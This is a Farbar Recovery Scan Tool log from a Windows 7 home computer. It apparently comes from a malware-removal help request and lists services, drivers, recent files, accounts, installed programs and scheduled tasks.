R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2829552 2016-03-08] (Microsoft Corporation)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe [130976 2011-03-01] (Futuremark Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] ()
R2 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-18] (RealNetworks, Inc.)
R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] ()
R2 Secunia PSI Agent; C:\Program Files (x86)\Secunia\PSI\PSIA.exe [994360 2011-10-14] (Secunia)
R2 Secunia Update Agent; C:\Program Files (x86)\Secunia\PSI\sua.exe [399416 2011-10-14] (Secunia)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-05-03] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-05-03] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [107792 2016-05-03] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-05-03] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-05-03] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1070904 2016-05-03] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [465792 2016-05-03] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [166432 2016-05-03] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [287528 2016-05-03] (AVAST Software)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-05-03] (Malwarebytes)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64896 2016-03-10] (Malwarebytes Corporation)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2010-02-02] (Printing Communications Assoc., Inc. (PCAUSA))
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2016-05-03] ()
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [452040 2016-02-22] (BitDefender S.R.L.)
S3 cpuz134; \??\C:\Users\kathy\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X]
S3 MREMPR5; \??\C:\PROGRA~2\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~2\COMMON~1\Motive\MRENDIS5.SYS [X]
S3 X6va015; \??\C:\Windows\SysWOW64\Drivers\X6va015 [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-03 19:29 - 2016-05-03 19:29 - 00021956 _____ C:\Users\kathy\Desktop\FRST.txt
2016-05-03 14:23 - 2016-05-03 14:23 - 00003890 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1462303413
2016-05-03 14:23 - 2016-05-03 14:23 - 00000997 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-05-03 14:23 - 2016-05-03 14:23 - 00000997 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-05-03 08:33 - 2016-05-03 08:33 - 00398152 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-05-03 08:33 - 2016-05-03 08:32 - 00037144 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2016-05-03 08:32 - 2016-05-03 08:32 - 00052184 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-05-03 06:38 - 2016-05-03 06:38 - 00024688 _____ C:\Windows\system32\Drivers\TrueSight.sys
2016-05-03 06:37 - 2016-05-03 06:37 - 19779656 _____ C:\Users\kathy\Desktop\RogueKiller.exe
2016-05-03 06:37 - 2016-05-03 06:37 - 00000000 ____D C:\ProgramData\RogueKiller
2016-05-03 05:57 - 2016-05-03 14:21 - 00000000 ____D C:\AdwCleaner
2016-05-02 22:00 - 2016-05-02 22:02 - 00207240 _____ C:\TDSSKiller.3.1.0.9_02.05.2016_22.00.59_log.txt
2016-05-02 22:00 - 2016-05-02 22:00 - 00000420 _____ C:\TDSSKiller.2.4.18.0_02.05.2016_22.00.04_log.txt
2016-05-02 19:31 - 2016-05-03 19:29 - 00000000 ____D C:\FRST
2016-05-02 19:31 - 2016-05-02 19:31 - 02377216 _____ (Farbar) C:\Users\kathy\Desktop\FRST64.exe
2016-05-02 19:16 - 2016-05-02 19:16 - 00000000 ____D C:\Program Files\BDServices
2016-04-28 06:26 - 2016-04-28 06:26 - 00000866 _____ C:\Users\kathy\Documents\cc_20160428_062642.reg
2016-04-26 17:36 - 2016-04-26 17:36 - 00000000 ____D C:\Users\kathy\AppData\Roaming\c7738a
2016-04-26 17:36 - 2016-04-26 17:36 - 00000000 ____D C:\Users\kathy\AppData\Local\fb05b4
2016-04-26 14:19 - 2016-04-26 14:27 - 00000000 ____D C:\Users\kathy\AppData\Local\Xfinity Usage Meter
2016-04-17 06:33 - 2016-04-17 06:33 - 00002812 _____ C:\Users\kathy\Documents\cc_20160417_063339.reg
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files\iTunes
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files\iPod
2016-04-17 06:18 - 2016-04-17 06:18 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-17 06:16 - 2016-04-17 06:16 - 00000000 ____D C:\Windows\System32\Tasks\Apple
2016-04-17 06:16 - 2016-04-17 06:16 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-11 19:19 - 2016-05-02 19:06 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-03 19:28 - 2011-04-28 22:54 - 00000000 ____D C:\Users\kathy\Desktop\bad stuff programs
2016-05-03 19:06 - 2012-09-08 07:07 - 00000338 _____ C:\Windows\Tasks\HP Photo Creations Communicator.job
2016-05-03 18:59 - 2013-02-24 07:52 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-05-03 18:44 - 2013-05-04 19:19 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-05-03 17:29 - 2009-07-13 23:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-05-03 17:29 - 2009-07-13 23:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-05-03 15:28 - 2014-11-15 06:50 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-05-03 14:28 - 2009-07-14 00:13 - 00795858 _____ C:\Windows\system32\PerfStringBackup.INI
2016-05-03 14:28 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-05-03 14:23 - 2014-03-18 19:33 - 00003206 _____ C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000
2016-05-03 14:23 - 2013-06-21 09:13 - 00003340 _____ C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-3123285271-2719112281-3259339859-1000
2016-05-03 14:22 - 2013-02-24 07:52 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-05-03 14:22 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-05-03 14:18 - 2014-03-16 12:02 - 00000000 ____D C:\Users\kathy\AppData\Local\Battle.net
2016-05-03 08:45 - 2014-03-16 12:01 - 00000000 ____D C:\Program Files (x86)\Battle.net
2016-05-03 08:45 - 2012-09-16 09:22 - 00000000 ____D C:\Program Files (x86)\World of Warcraft
2016-05-03 08:33 - 2014-08-04 10:59 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-05-03 08:33 - 2014-01-16 17:38 - 00166432 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-05-03 08:33 - 2013-05-04 20:56 - 00465792 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2016-05-03 08:33 - 2013-05-04 20:56 - 00287528 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-05-03 08:33 - 2013-05-04 20:56 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-05-03 08:33 - 2013-05-04 20:56 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-05-03 08:33 - 2013-05-04 20:55 - 00107792 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2016-05-03 08:33 - 2013-05-04 20:55 - 00003924 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-05-03 08:33 - 2013-05-04 20:48 - 00000000 ____D C:\ProgramData\AVAST Software
2016-05-03 08:32 - 2013-05-04 20:56 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2016-05-03 08:32 - 2013-05-04 20:55 - 00000000 ____D C:\Program Files\AVAST Software
2016-04-28 15:00 - 2016-03-11 13:13 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-04-28 15:00 - 2016-03-11 13:13 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-04-27 23:59 - 2013-05-04 20:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-04-26 13:29 - 2012-05-16 08:07 - 00000000 ____D C:\Program Files (x86)\Diablo III
2016-04-23 10:56 - 2015-07-11 06:42 - 00000000 ____D C:\Program Files (x86)\Diablo III Public Test
2016-04-19 06:02 - 2014-02-16 21:08 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-04-19 06:01 - 2014-02-16 21:07 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-04-17 06:18 - 2011-12-30 14:54 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-17 06:16 - 2011-12-30 14:55 - 00002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-16 12:39 - 2016-02-14 09:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-04-12 06:14 - 2012-08-07 17:24 - 00000000 ____D C:\Users\kathy\Desktop\just stuff to keep
2016-04-09 06:42 - 2014-03-16 12:14 - 00000000 ____D C:\Windows\Minidump
2016-04-07 13:44 - 2013-05-04 19:19 - 00797376 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-04-07 13:44 - 2013-05-04 19:19 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-07 13:44 - 2013-05-04 19:19 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

==================== Files in the root of some directories =======

2016-05-02 19:16 - 2016-05-02 19:26 - 0000115 _____ () C:\Users\kathy\AppData\Roaming\LogFile.txt
2014-05-24 06:34 - 2014-05-24 06:34 - 0000042 _____ () C:\Users\kathy\AppData\Roaming\mbam.context.scan
2013-12-22 18:23 - 2014-01-16 01:24 - 0000056 _____ () C:\Users\kathy\AppData\Roaming\WB.CFG
2013-08-20 19:55 - 2013-08-20 19:55 - 0003584 _____ () C:\Users\kathy\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-15 17:18 - 2011-09-15 17:18 - 0000093 _____ () C:\Users\kathy\AppData\Local\fusioncache.dat
2011-04-28 21:57 - 2016-02-14 08:06 - 0007609 _____ () C:\Users\kathy\AppData\Local\resmon.resmoncfg

Some files in TEMP:
====================
C:\Users\kathy\AppData\Local\Temp\dllnt_dump.dll
C:\Users\kathy\AppData\Local\Temp\libeay32.dll
C:\Users\kathy\AppData\Local\Temp\msvcr120.dll
C:\Users\kathy\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-04-28 00:10

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:03-05-2016
Ran by [removed] (2016-05-03 19:29:23)
Running from C:\Users\[removed]\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-04-29 00:50:16)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3123285271-2719112281-3259339859-500 - Administrator - Disabled)
ASPNET (S-1-5-21-3123285271-2719112281-3259339859-1004 - Limited - Enabled)
Guest (S-1-5-21-3123285271-2719112281-3259339859-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3123285271-2719112281-3259339859-1002 - Limited - Enabled)
kathy (S-1-5-21-3123285271-2719112281-3259339859-1000 - Administrator - Enabled) => C:\Users\kathy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20060 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)
Adobe Flash Player 21 ActiveX (HKLM-x32\…\Adobe Flash Player ActiveX) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\…\Adobe Flash Player NPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\…\{9AB0D5B6-4779-8C4F-CA91-A1FEDB56D7EC}) (Version: 8.0.911.0 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\…\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\…\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\…\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\…\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\…\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.4.5.0 - Asmedia Technology)
Auslogics DiskDefrag (HKLM-x32\…\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.5.5.0 - Auslogics Labs Pty Ltd)
Avast Free Antivirus (HKLM-x32\…\avast) (Version: 11.2.2262 - AVAST Software)
Battle.net (HKLM-x32\…\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\…\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\…\CCleaner) (Version: 4.17 - Piriform)
Diablo III (HKLM-x32\…\Diablo III) (Version:  - Blizzard Entertainment)
Futuremark SystemInfo (HKLM-x32\…\{BEE64C14-BEF1-4610-8A68-A16EAA47B882}) (Version: 4.0.0.0 - Futuremark Corporation)
Google Chrome (HKLM-x32\…\Google Chrome) (Version: 50.0.2661.94 - Google Inc.)
Google Drive (HKLM-x32\…\{D7269C20-B3CE-4CD0-8E88-3D307D3BD41A}) (Version: 1.29.2074.1528 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP Deskjet 1050 J410 series Basic Device Software (HKLM\…\{4268BF51-DFDF-4178-8B8D-5D5752FCAA58}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 1050 J410 series Help (HKLM-x32\…\{5C90D8CF-F12A-41C6-9007-3B651A1F0D78}) (Version: 140.0.66.66 - Hewlett Packard)
HP Photo Creations (HKLM-x32\…\HP Photo Creations) (Version: 1.0.0.12262 - HP Photo Creations Powered by RocketLife)
HP Update (HKLM-x32\…\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
iCloud (HKLM\…\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)
Intel(R) Management Engine Components (HKLM-x32\…\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
iTunes (HKLM\…\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
JMicron JMB36X Driver (HKLM-x32\…\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.00.0000 - JMICRON Technology Corp.)
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Logitech GamePanel Software 3.03.133 (HKLM\…\{6CC95B76-D380-46B2-9022-9353938E48BA}) (Version: 3.03.133 - Logitech Inc.)
Logitech SetPoint 6.65 (HKLM\…\sp6) (Version: 6.65.62 - Logitech)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\…\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\…\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 4.5.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 7.1 (HKLM\…\{5EBE0F1F-45DF-4298-AC6B-E8E54EAEC834}) (Version: 7.10.344.0 - Microsoft)
Microsoft IntelliType Pro 8.1 (HKLM\…\Microsoft IntelliType Pro 8.1) (Version: 8.15.406.0 - Microsoft)
Microsoft Office Professional Plus 2013 - en-us (HKLM\…\ProPlusRetail - en-us) (Version: 15.0.4815.1001 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\…\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\…\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\…\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\…\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\…\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\…\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\…\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\…\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\…\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\…\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\…\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\…\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\…\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 46.0 (x86 en-US) (HKLM-x32\…\Mozilla Firefox 46.0 (x86 en-US)) (Version: 46.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\…\MozillaMaintenanceService) (Version: 45.0.2.5941 - Mozilla)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4815.1001 - Microsoft Corporation) Hidden
RealDownloader (x32 Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\…\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\…\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.37.1229.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\…\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6251 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.101 (x32 Version: 1.48.2066.101 - Avast Software) Hidden
Secunia PSI (2.0.0.4003) (HKLM-x32\…\Secunia PSI) (Version: 2.0.0.4003 - Secunia)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Ventrilo Client (HKLM-x32\…\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Ventrilo Server (HKLM-x32\…\{1D46A3A0-B37D-423A-91C2-101A49E2FF80}) (Version: 3.0.3 - Flagship Industries, Inc.)
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Windows Live Essentials (HKLM-x32\…\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM-x32\…\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\…\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\…\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
World of Warcraft (HKLM-x32\…\World of Warcraft) (Version:  - Blizzard Entertainment)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {074EC646-EFF5-4CA5-A892-6C066DC5CE87} - System32\Tasks\{B937D728-AB5C-4F88-8D65-C3ADBD29CE50} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {19B7D6A0-1808-4FD1-BD19-935DAD1FA2A4} - System32\Tasks\{FC628A37-3763-4AC5-B27E-973517F50165} => C:\Users\kathy\Desktop\Diablo-III-8370-enUS-Installer-downloader.exe
Task: {26563BA1-3BD0-441E-8C85-D44EFEB87A00} - System32\Tasks\{80A88456-7E5F-45D3-9003-B567194B373F} => Firefox.exe
Task: {328C022A-4603-45A5-BB9E-C27D625C23D5} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-05-03] (AVAST Software)
Task: {33E3B0FC-70CA-4519-B57A-256B05DF7566} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {375D7310-C802-4889-9808-CBEBB3DFA519} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-27] (Microsoft Corporation)
Task: {3D49DEAE-65F0-42BA-B0F6-980FAFAD575A} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2013-09-22] ()
Task: {3F180597-B0E1-4B7F-A766-ECE646A1DA86} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-10-27] (Microsoft Corporation)
Task: {3F1AA883-2D57-4DCA-8705-C253A9C6ED2A} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-3123285271-2719112281-3259339859-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-10-30] (RealNetworks, Inc.)
Task: {4CA61C7B-185B-43D7-A1B9-F710F69AA15D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
Task: {5D874E5D-2530-4DCB-9B0E-B1F439BB8F53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2016-02-09] (Microsoft Corporation)
